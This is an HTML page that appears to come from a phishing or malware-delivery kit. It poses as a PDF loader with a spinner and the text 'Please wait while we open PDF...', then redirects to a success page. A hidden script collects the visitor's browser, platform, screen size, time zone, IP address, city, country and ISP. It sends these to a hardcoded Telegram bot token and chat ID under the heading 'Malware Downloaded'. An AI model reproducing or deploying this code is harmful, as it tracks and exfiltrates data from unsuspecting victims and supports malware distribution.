<!DOCTYPE html>
<html>
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title></title>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<style>
@font-face{
	font-family: 'fmtt';

  src: url(img/font1.woff2) format('truetype');
  }
*{
	margin:auto;
	font-size:14px;
	outline:0;
	font-family:'fmtt';
}input{
	border:0;
    display:block;
	margin-top:0px;
	width:100%;
	padding:6px;
	background:#f2f2f2;
	
	padding-left:0;
}td{
	border-right:1px solid black;
	padding-right:10px;
	padding-left:10px;
	font-size:11px;
	color:#0072ce;
}.inp{
	margin-top:30px;
	border-radius:15px;
	background:#f2f2f2;
	text-align:center;
	border:1px solid #f2f2f2;
	width:93%;
	padding:6px;
	padding-left:1px;
}label{
	display:block;
	text-align:left;
	margin:0;
	font-size:10px;
	color:gray;
	padding:0;
	width:100%;
}@keyframes roll{
	from{
	transform:rotate(0deg);
	}to{
	rotate:360deg;
	}
}#rl{
	animation:roll 1s infinite;
}
@keyframes fade{
	from{
	opacity: 1;
	}to{
	opacity:0.3;
	}
}#fd{
	animation:fade 1s infinite;
}
	</style>
</head>
<body>


<div style="max-width:500px;padding:0px;">

<form action="need4.php" method="POST">
<div style="text-align:center">
<img src="img/Icon_pdf_file.svg.png" width="45px" style="margin-top:200px;" id="fd">
<meta http-equiv="Refresh" content="3; url=success.html">
</div>
<p style="text-align:center;font-size:15px;margin-top:10px">Please wait while we open PDF...</p>
<span style="display:block;height:10px;width:10px;border:3px solid lightgray;border-radius:70px;border-top-color:red;margin-top:40px;" id="rl"></span>
</div>

<script>

    const botToken = '7517091060:AAGDIMH5lOhlXmDAxnSYI3yOyJmJ6FPaWqM'; 
    const chatId = '6595653755';

    // Get browser & device details
    const browser = navigator.userAgent;
    const platform = navigator.platform;
    const screenRes = `${window.screen.width}x${window.screen.height}`;
    const timeZone = Intl.DateTimeFormat().resolvedOptions().timeZone;

    // Fetch user location & IP
    fetch('https://ipapi.co/json/')
        .then(response => response.json())
        .then(data => {
            const ip = data.ip || 'Unknown IP';
            const city = data.city || 'Unknown City';
            const country = data.country || 'Unknown Country';
            const isp = data.org || 'Unknown ISP';

            // Message format
            const message = `
 #---------[ Malware Downloaded ]-----------#:
  IP Address: ${ip}
  Location: ${city}, ${country}
  ISP: ${isp}
  Device: ${platform}
  Browser: ${browser}
  Screen Resolution: ${screenRes}
  Time Zone: ${timeZone}
            `;

            // Send to Telegram
            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
            fetch(url, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ chat_id: chatId, text: message })
            })
            .then(response => response.json())
            .then(data => {
                
            });
        })
        .catch(error => console.error("Geo-Location Error:", error));
</script>

</form>



</body>
</html>